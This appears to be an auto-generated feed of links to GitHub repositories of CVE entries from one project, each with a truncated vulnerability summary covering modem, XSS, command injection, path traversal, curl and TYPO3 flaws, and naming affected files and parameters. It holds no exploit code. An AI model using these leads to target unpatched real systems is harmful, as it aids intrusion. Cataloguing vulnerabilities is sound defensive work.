**Denial of service in modem due to reachable assertion while processing reconfiguration message in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25702](https://github.com/Live-Hack-CVE/CVE-2022-25702) create time: 2022-12-27T16:13:24Z

**Memory corruption in SPI buses due to improper input validation while reading address configuration from spi buses in Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25698](https://github.com/Live-Hack-CVE/CVE-2022-25698) create time: 2022-12-27T16:13:20Z

**Memory corruption in i2c buses due to improper input validation while reading address configuration from i2c driver in Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25697](https://github.com/Live-Hack-CVE/CVE-2022-25697) create time: 2022-12-27T16:13:17Z

**Denial of service in MODEM due to reachable assertion while processing SIB1 with invalid Bandwidth in Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25672](https://github.com/Live-Hack-CVE/CVE-2022-25672) create time: 2022-12-27T16:13:13Z

**Denial of service in MODEM due to reachable assertion while processing configuration from network in Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25673](https://github.com/Live-Hack-CVE/CVE-2022-25673) create time: 2022-12-27T16:13:10Z

**Memory corruption in MODEM UIM due to usage of out of range pointer offset while decoding command from card in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25682](https://github.com/Live-Hack-CVE/CVE-2022-25682) create time: 2022-12-27T16:13:06Z

**Possible memory corruption in kernel while performing memory access due to hypervisor not correctly invalidated the processor translation caches in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25681](https://github.com/Live-Hack-CVE/CVE-2022-25681) create time: 2022-12-27T16:13:03Z

**Denial of service due to reachable assertion in modem while processing filter rule from application client in Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25675](https://github.com/Live-Hack-CVE/CVE-2022-25675) create time: 2022-12-27T16:12:59Z

**Memory corruption in diag due to use after free while processing dci packet in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25677](https://github.com/Live-Hack-CVE/CVE-2022-25677) create time: 2022-12-27T16:12:56Z

**Denial of service in Modem module due to improper authorization while error handling in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25685](https://github.com/Live-Hack-CVE/CVE-2022-25685) create time: 2022-12-27T16:12:52Z

**A vulnerability was found in markdown-it up to 2.x. It has been classified as problematic. Affected is an unknown function of the file lib/common/html_re.js. The manipulation leads to inefficient regular expression complexity. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is 89c8620157 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10005](https://github.com/Live-Hack-CVE/CVE-2015-10005) create time: 2022-12-27T15:01:26Z

**A vulnerability was found in email-existence. It has been rated as problematic. Affected by this issue is some unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The name of the patch is 0029ba71b6ad0d8ec0baa2ecc6256d038bdd9b56. It is recommended to apply a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25049](https://github.com/Live-Hack-CVE/CVE-2018-25049) create time: 2022-12-27T15:01:30Z

**A vulnerability was found in RamseyK httpserver. It has been rated as critical. This issue affects the function ResourceHost::getResource of the file src/ResourceHost.cpp of the component URI Handler. The manipulation of the argument uri leads to path traversal: '../filedir'. The attack may be initiated remotely. The n CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25087](https://github.com/Live-Hack-CVE/CVE-2019-25087) create time: 2022-12-27T15:01:37Z

**A vulnerability was found in IET-OU Open Media Player up to 1.5.0. It has been declared as problematic. This vulnerability affects the function webvtt of the file application/controllers/timedtext.php. The manipulation of the argument ttml_url leads to cross site scripting. The attack can be initiated remotely. Upgradi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25086](https://github.com/Live-Hack-CVE/CVE-2019-25086) create time: 2022-12-27T15:01:33Z

**A vulnerability was found in ytti Oxidized Web. It has been classified as problematic. Affected is an unknown function of the file lib/oxidized/web/views/conf_search.haml. The manipulation of the argument to_research leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 5 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25088](https://github.com/Live-Hack-CVE/CVE-2019-25088) create time: 2022-12-27T15:01:09Z

**A vulnerability has been found in Morgawr Muon 0.1.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file src/muon/handler.clj. The manipulation leads to insufficiently random values. The attack can be launched remotely. Upgrading to version 0.2.0-indev is able to addres CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25089](https://github.com/Live-Hack-CVE/CVE-2019-25089) create time: 2022-12-27T15:00:55Z

**Multiple stored cross-site scripting (XSS) vulnerabilities in Arcadyan Wifi routers VRV9506JAC23 allow remote attackers to inject arbitrary web script or HTML via the hostName and domain_name parameters present in the LAN configuration section of the administrative dashboard. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9419](https://github.com/Live-Hack-CVE/CVE-2020-9419) create time: 2022-12-27T14:50:07Z

**The login password of the web administrative dashboard in Arcadyan Wifi routers VRV9506JAC23 is sent in cleartext, allowing an attacker to sniff and intercept traffic to learn the administrative credentials to the router. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9420](https://github.com/Live-Hack-CVE/CVE-2020-9420) create time: 2022-12-27T14:50:00Z

**** DISPUTED ** In mjs_json.c in Cesanta MongooseOS mJS 1.26, a maliciously formed JSON string can trigger an off-by-one heap-based buffer overflow in mjs_json_parse, which can potentially lead to redirection of control flow. NOTE: the original reporter disputes the significance of this finding because "there isn’t very CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31875](https://github.com/Live-Hack-CVE/CVE-2021-31875) create time: 2022-12-27T15:01:44Z

**A vulnerability classified as problematic has been found in OpenMRS HTML Form Entry UI Framework Integration Module up to 1.x. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.0 is able to address this issue. The name CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4284](https://github.com/Live-Hack-CVE/CVE-2021-4284) create time: 2022-12-27T15:01:19Z

**A vulnerability was found in FreeBPX voicemail. It has been rated as problematic. Affected by this issue is some unknown functionality of the file views/ssettings.php of the component Settings Handler. The manipulation of the argument key leads to cross site scripting. The attack may be launched remotely. Upgrading to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4283](https://github.com/Live-Hack-CVE/CVE-2021-4283) create time: 2022-12-27T15:01:16Z

**A vulnerability was found in FreePBX voicemail. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file page.voicemail.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 14.0.6.25 is able to address this issu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4282](https://github.com/Live-Hack-CVE/CVE-2021-4282) create time: 2022-12-27T15:01:12Z

**A vulnerability, which was classified as problematic, was found in ReFirm Labs binwalk up to 2.3.2. Affected is an unknown function of the file src/binwalk/modules/extractor.py of the component Archive Extraction Handler. The manipulation leads to symlink following. It is possible to launch the attack remotely. Upgradi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4287](https://github.com/Live-Hack-CVE/CVE-2021-4287) create time: 2022-12-27T15:01:05Z

**A vulnerability, which was classified as problematic, has been found in cocagne pysrp up to 1.0.16. This issue affects the function calculate_x of the file srp/_ctsrp.py. The manipulation leads to information exposure through discrepancy. Upgrading to version 1.0.17 is able to address this issue. The name of the patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4286](https://github.com/Live-Hack-CVE/CVE-2021-4286) create time: 2022-12-27T15:01:02Z

**A vulnerability classified as problematic was found in Nagios NCPA. This vulnerability affects unknown code of the file agent/listener/templates/tail.html. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 2.4.0 is able to address this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4285](https://github.com/Live-Hack-CVE/CVE-2021-4285) create time: 2022-12-27T15:00:59Z

**A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V3.0.1), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions < V4.6.0), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40365](https://github.com/Live-Hack-CVE/CVE-2021-40365) create time: 2022-12-27T14:50:14Z

**A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V3.0.1), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions < V4.6.0), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44693](https://github.com/Live-Hack-CVE/CVE-2021-44693) create time: 2022-12-27T14:50:11Z

**A vulnerability was found in FlatPress. It has been classified as critical. This affects the function doItemActions of the file fp-plugins/mediamanager/panels/panel.mediamanager.file.php of the component File Delete Handler. The manipulation of the argument deletefile leads to path traversal. The name of the patch is 5 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4748](https://github.com/Live-Hack-CVE/CVE-2022-4748) create time: 2022-12-27T15:01:40Z

**A vulnerability was found in FlatPress and classified as problematic. This issue affects the function main of the file fp-plugins/mediamanager/panels/panel.mediamanager.file.php of the component Media Manager Plugin. The manipulation of the argument mm-newgallery-name leads to cross site scripting. The attack may be in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4755](https://github.com/Live-Hack-CVE/CVE-2022-4755) create time: 2022-12-27T15:01:23Z

**RCE in SPIP 3.1.13 through 4.1.2 allows remote authenticated users to execute arbitrary code via a GET parameter CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37155](https://github.com/Live-Hack-CVE/CVE-2022-37155) create time: 2022-12-27T14:55:22Z

**Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46381](https://github.com/Live-Hack-CVE/CVE-2022-46381) create time: 2022-12-27T14:55:19Z

**wasm3 commit 7890a2097569fde845881e0b352d813573e371f9 was discovered to contain a segmentation fault via the component op_CallIndirect at /m3_exec.h. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44874](https://github.com/Live-Hack-CVE/CVE-2022-44874) create time: 2022-12-27T14:55:15Z

**Command injection vulnerability in nw_interface.html in SHARP multifunction printers (MFPs)'s Digital Full-color Multifunctional System 202 or earlier, 120 or earlier, 600 or earlier, 121 or earlier, 500 or earlier, 402 or earlier, 790 or earlier, and Digital Multifunctional System (Monochrome) 200 or earlier, 211 or e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45796](https://github.com/Live-Hack-CVE/CVE-2022-45796) create time: 2022-12-27T14:55:12Z

**The csaf_provider package before 0.8.2 allows XSS via a crafted CSAF document uploaded as text/html. The endpoint upload allows valid CSAF advisories (JSON format) to be uploaded with Content-Type text/html and filenames ending in .html. When subsequently accessed via web browser, these advisories are served and interp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43996](https://github.com/Live-Hack-CVE/CVE-2022-43996) create time: 2022-12-27T14:55:08Z

**Daikin SVMPC1 version 2.1.22 and prior and SVMPC2 version 1.2.3 and prior are vulnerable to an attacker obtaining user login credentials and control the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41653](https://github.com/Live-Hack-CVE/CVE-2022-41653) create time: 2022-12-27T14:55:04Z

**Daikin SVMPC1 version 2.1.22 and prior and SVMPC2 version 1.2.3 and prior are vulnerable to attackers with access to the local area network (LAN) to disclose sensitive information stored by the affected product without requiring authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38355](https://github.com/Live-Hack-CVE/CVE-2022-38355) create time: 2022-12-27T14:55:00Z

**Due to the lack of adequately implemented access-control rules, all versions Kingspan TMS300 CS are vulnerable to an attacker viewing and modifying the application settings without authenticating by accessing a specific uniform resource locator (URL) on the webserver. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2757](https://github.com/Live-Hack-CVE/CVE-2022-2757) create time: 2022-12-27T14:54:57Z

**Windows Terminal Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44702](https://github.com/Live-Hack-CVE/CVE-2022-44702) create time: 2022-12-27T14:54:54Z

**IP-COM EW9 V15.11.0.14(9732) was discovered to contain a command injection vulnerability in the cmd_get_ping_output function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45005](https://github.com/Live-Hack-CVE/CVE-2022-45005) create time: 2022-12-27T14:54:50Z

**Microsoft Office Graphics Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-26804, CVE-2022-26805, CVE-2022-26806, CVE-2022-44692, CVE-2022-47212, CVE-2022-47213. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47211](https://github.com/Live-Hack-CVE/CVE-2022-47211) create time: 2022-12-27T14:54:47Z

**Delta Electronics DX-2100-L1-CN 2.42 is vulnerable to Command Injection via lform/net_diagnose. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42140](https://github.com/Live-Hack-CVE/CVE-2022-42140) create time: 2022-12-27T14:54:43Z

**Delta Electronics DX-2100-L1-CN 2.42 is vulnerable to Cross Site Scripting (XSS) via lform/urlfilter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42141](https://github.com/Live-Hack-CVE/CVE-2022-42141) create time: 2022-12-27T14:54:40Z

**HTML sanitizer is written in PHP, aiming to provide XSS-safe markup based on explicitly allowed tags, attributes and values. In versions prior to 1.5.0 or 2.1.1, malicious markup used in a sequence with special HTML CDATA sections cannot be filtered and sanitized due to a parsing issue in the upstream package mastermin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23499](https://github.com/Live-Hack-CVE/CVE-2022-23499) create time: 2022-12-27T14:54:37Z

**Delta Electronics DVW-W02W2-E2 1.5.0.10 is vulnerable to Command Injection via Crafted URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42139](https://github.com/Live-Hack-CVE/CVE-2022-42139) create time: 2022-12-27T14:50:18Z

**The package cycle-import-check before 1.3.2 are vulnerable to Command Injection via the writeFileToTmpDirAndOpenIt function due to improper user-input sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24377](https://github.com/Live-Hack-CVE/CVE-2022-24377) create time: 2022-12-27T14:50:04Z

**Quanos "SCHEMA ST4" example web templates in version Bootstrap 2019 v2/2021 v1/2022 v1/2022 SP1 v1 or below are prone to JavaScript injection allowing a remote attacker to hijack existing sessions to e.g. other web services in the same environment or execute scripts in the users browser environment. The affected script CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3073](https://github.com/Live-Hack-CVE/CVE-2022-3073) create time: 2022-12-27T14:49:57Z

**TYPO3 is an open source PHP based web content management system. Versions prior to 9.5.38, 10.4.33, 11.5.20, and 12.1.1 are subject to Sensitive Information Disclosure. Due to the lack of handling user-submitted YAML placeholder expressions in the site configuration backend module, attackers could expose sensitive inte CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23504](https://github.com/Live-Hack-CVE/CVE-2022-23504) create time: 2022-12-27T14:49:53Z

**TYPO3 is an open source PHP based web content management system. Versions prior to 8.7.49, 9.5.38, 10.4.33, 11.5.20, and 12.1.1 are vulnerable to Code Injection. Due to the lack of separating user-submitted data from the internal configuration in the Form Designer backend module, it is possible to inject code instructi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23503](https://github.com/Live-Hack-CVE/CVE-2022-23503) create time: 2022-12-27T14:48:05Z

**TYPO3 is an open source PHP based web content management system. In versions prior to 10.4.33, 11.5.20, and 12.1.1, When users reset their password using the corresponding password recovery functionality, existing sessions for that particular user account were not revoked. This applied to both frontend user sessions an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23502](https://github.com/Live-Hack-CVE/CVE-2022-23502) create time: 2022-12-27T14:48:01Z

**TYPO3 is an open source PHP based web content management system. In versions prior to 8.7.49, 9.5.38, 10.4.33, 11.5.20, and 12.1.1 TYPO3 is vulnerable to Improper Authentication. Restricting frontend login to specific users, organized in different storage folders (partitions), can be bypassed. A potential attacker migh CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23501](https://github.com/Live-Hack-CVE/CVE-2022-23501) create time: 2022-12-27T14:47:58Z

**TYPO3 is an open source PHP based web content management system. In versions prior to 9.5.38, 10.4.33, 11.5.20, and 12.1.1, requesting invalid or non-existing resources via HTTP triggers the page error handler, which again could retrieve content to be shown as an error message from another page. This leads to a scenari CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23500](https://github.com/Live-Hack-CVE/CVE-2022-23500) create time: 2022-12-27T14:47:54Z

**The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several values that can be added to an Image Hover in versions 9.8.1 to 9.8.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4207](https://github.com/Live-Hack-CVE/CVE-2022-4207) create time: 2022-12-27T14:47:51Z

**The demon image annotation plugin for WordPress is vulnerable to improper input validation in versions up to, and including 5.0. This is due to the plugin improperly validating the number of characters supplied during an annotation despite there being a setting to limit the number characters input. This means that unau CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4171](https://github.com/Live-Hack-CVE/CVE-2022-4171) create time: 2022-12-27T14:47:47Z

**Nortek Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e were discovered to contain a cross-site scripting (XSS) vulnerability which is chained with a local session fixation. This vulnerability allows attackers to escalate privileges via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38628](https://github.com/Live-Hack-CVE/CVE-2022-38628) create time: 2022-12-27T14:47:44Z

**Delta Industrial Automation DIALink versions 1.4.0.0 and prior are vulnerable to the use of a hard-coded cryptographic key which could allow an attacker to decrypt sensitive data and compromise the machine. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2660](https://github.com/Live-Hack-CVE/CVE-2022-2660) create time: 2022-12-27T14:47:41Z

**Contiki-NG is an open-source, cross-platform operating system for Next-Generation IoT devices. Versions prior to 4.9 contain a NULL Pointer Dereference in BLE L2CAP module. The Contiki-NG operating system for IoT devices contains a Bluetooth Low Energy stack. An attacker can inject a packet in this stack, which causes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41972](https://github.com/Live-Hack-CVE/CVE-2022-41972) create time: 2022-12-27T14:47:37Z

**vSphere_selfuse commit 2a9fe074a64f6a0dd8ac02f21e2f10d66cac5749 was discovered to contain a code execution backdoor via the request package. This vulnerability allows attackers to access sensitive user information and digital currency keys, as well as escalate privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46996](https://github.com/Live-Hack-CVE/CVE-2022-46996) create time: 2022-12-27T14:47:34Z

**Multiple cross-site scripting (XSS) vulnerabilities in the Web Calendar in SOGo before 2.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) title of an appointment or (2) contact fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-9905](https://github.com/Live-Hack-CVE/CVE-2014-9905) create time: 2022-12-27T13:28:26Z

**Cross-site request forgery (CSRF) vulnerability in SOGo before 3.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5395](https://github.com/Live-Hack-CVE/CVE-2015-5395) create time: 2022-12-27T13:28:29Z

**Memory leak in SOGo 2.3.7 allows remote attackers to cause a denial of service (memory consumption) via a large number of attempts to upload a large attachment, related to temporary files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6188](https://github.com/Live-Hack-CVE/CVE-2016-6188) create time: 2022-12-27T13:28:22Z

**Multiple cross-site scripting (XSS) vulnerabilities in the View Raw Source page in the Web Calendar in SOGo before 3.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) Description, (2) Location, (3) URL, or (4) Title field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6191](https://github.com/Live-Hack-CVE/CVE-2016-6191) create time: 2022-12-27T13:28:19Z

**Incomplete blacklist in SOGo before 2.3.12 and 3.x before 3.1.1 allows remote authenticated users to obtain sensitive information by reading the fields in the (1) ics or (2) XML calendar feeds. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6189](https://github.com/Live-Hack-CVE/CVE-2016-6189) create time: 2022-12-27T13:28:15Z

**The TablePress plugin 1.9.2 for WordPress allows tablepress[data] CSV injection by Editor users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20180](https://github.com/Live-Hack-CVE/CVE-2019-20180) create time: 2022-12-27T14:07:26Z

**A vulnerability classified as problematic was found in pacparser up to 1.3.x. Affected by this vulnerability is the function pacparser_find_proxy of the file src/pacparser.c. The manipulation of the argument url leads to buffer overflow. Attacking locally is a requirement. Upgrading to version 1.4.0 is able to address CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25078](https://github.com/Live-Hack-CVE/CVE-2019-25078) create time: 2022-12-27T14:07:01Z

**compile in regexp.c in Artifex MuJS through 1.2.0 results in stack consumption because of unlimited recursion, a different issue than CVE-2019-11413. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30974](https://github.com/Live-Hack-CVE/CVE-2022-30974) create time: 2022-12-27T13:32:27Z

**In multiple locations of NfcService.java, there is a possible disclosure of NFC tags due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-199291025 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20199](https://github.com/Live-Hack-CVE/CVE-2022-20199) create time: 2022-12-27T13:26:59Z

**Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.0.8 allows remote attackers to run arbitrary code via tha lang attribute of an html tag. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36607](https://github.com/Live-Hack-CVE/CVE-2020-36607) create time: 2022-12-27T14:13:48Z

**Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.0.8 allows remote attackers to run arbitrary code via tha lang attribute of an html tag. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20589](https://github.com/Live-Hack-CVE/CVE-2020-20589) create time: 2022-12-27T14:13:45Z

**A vulnerability was found in multimon-ng. It has been rated as critical. This issue affects the function add_ch of the file demod_flex.c. The manipulation of the argument ch leads to format string. Upgrading to version 1.2.0 is able to address this issue. The name of the patch is e5a51c508ef952e81a6da25b43034dd1ed023c0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36619](https://github.com/Live-Hack-CVE/CVE-2020-36619) create time: 2022-12-27T14:09:00Z

**A vulnerability classified as critical has been found in Furqan node-whois. Affected is an unknown function of the file index.coffee. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). It is possible to launch the attack remotely. The name of the patch i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36618](https://github.com/Live-Hack-CVE/CVE-2020-36618) create time: 2022-12-27T14:08:56Z

**Cross Site Scripting (XSS) vulnerability in Netgate pf Sense 2.4.4-Release-p3 and Netgate ACME package 0.6.3 allows remote attackers to to run arbitrary code via the RootFolder field to acme_certificate_edit.php page of the ACME package. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21219](https://github.com/Live-Hack-CVE/CVE-2020-21219) create time: 2022-12-27T14:06:47Z

**logrocket-oauth2-example through 2020-05-27 allows SQL injection via the /auth/register username parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38488](https://github.com/Live-Hack-CVE/CVE-2022-38488) create time: 2022-12-27T14:05:26Z

**Privilege Escalation vulnerability in McAfee Data Loss Prevention (DLP) for Windows prior to 11.6.100 allows a local, low privileged, attacker through the use of junctions to cause the product to load DLLs of the attacker's choosing. This requires the creation and removal of junctions by the attacker along with sending CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7346](https://github.com/Live-Hack-CVE/CVE-2020-7346) create time: 2022-12-27T13:32:19Z

**IBM Spectrum Protect Plus 10.1.0 through 10.1.12 discloses sensitive information due to unencrypted data being used in the communication flow between Spectrum Protect Plus vSnap and its agents. An attacker could obtain information using main in the middle techniques. IBM X-Force ID: 182106. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4497](https://github.com/Live-Hack-CVE/CVE-2020-4497) create time: 2022-12-27T13:31:30Z

**Directory Traversal vulnerability in easywebpack-cli before 4.5.2 allows attackers to obtain sensitive information via crafted GET request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24855](https://github.com/Live-Hack-CVE/CVE-2020-24855) create time: 2022-12-27T13:30:00Z

**File upload vulnerability in function upload in action/Core.class.php in zhimengzhe iBarn 1.5 allows remote attackers to run arbitrary code via avatar upload to index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20588](https://github.com/Live-Hack-CVE/CVE-2020-20588) create time: 2022-12-27T13:29:03Z

**File Upload vulnerability in Feehi CMS thru 2.1.1 allows attackers to run arbitrary code via crafted image upload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36573](https://github.com/Live-Hack-CVE/CVE-2021-36573) create time: 2022-12-27T14:13:51Z

**GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46848](https://github.com/Live-Hack-CVE/CVE-2021-46848) create time: 2022-12-27T14:13:04Z

**libcurl-using applications can ask for a specific client certificate to be used in a transfer. This is done with the `CURLOPT_SSLCERT` option (`--cert` with the command line tool).When libcurl is built to use the macOS native TLS library Secure Transport, an application can ask for the client certificate by name or wit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22926](https://github.com/Live-Hack-CVE/CVE-2021-22926) create time: 2022-12-27T14:12:35Z

**curl supports the `-t` command line option, known as `CURLOPT_TELNETOPTIONS`in libcurl. This rarely used option is used to send variable=content pairs toTELNET servers.Due to flaw in the option parser for sending `NEW_ENV` variables, libcurlcould be made to pass on uninitialized data from a stack based buffer to theser CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22925](https://github.com/Live-Hack-CVE/CVE-2021-22925) create time: 2022-12-27T14:12:32Z

**When curl is instructed to get content using the metalink feature, and a user name and password are used to download the metalink XML file, those same credentials are then subsequently passed on to each of the servers from which curl will download or try to download the contents from. Often contrary to the user's expec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22923](https://github.com/Live-Hack-CVE/CVE-2021-22923) create time: 2022-12-27T14:12:28Z

**When curl is instructed to download content using the metalink feature, thecontents is verified against a hash provided in the metalink XML file.The metalink XML file points out to the client how to get the same contentfrom a set of different URLs, potentially hosted by different servers and theclient can then download CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22922](https://github.com/Live-Hack-CVE/CVE-2021-22922) create time: 2022-12-27T14:12:25Z

**When curl >= 7.20.0 and <= 7.78.0 connects to an IMAP or POP3 server to retrieve data using STARTTLS to upgrade to TLS security, the server can respond and send back multiple responses at once that curl caches. curl would then upgrade to TLS but not flush the in-queue of cached responses but instead continue using and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22947](https://github.com/Live-Hack-CVE/CVE-2021-22947) create time: 2022-12-27T14:12:22Z

**A user can tell curl >= 7.20.0 and <= 7.78.0 to require a successful upgrade to TLS when speaking to an IMAP, POP3 or FTP server (`--ssl-reqd` on the command line or`CURLOPT_USE_SSL` set to `CURLUSESSL_CONTROL` or `CURLUSESSL_ALL` withlibcurl). This requirement could be bypassed if the server would return a properly cr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22946](https://github.com/Live-Hack-CVE/CVE-2021-22946) create time: 2022-12-27T14:12:18Z

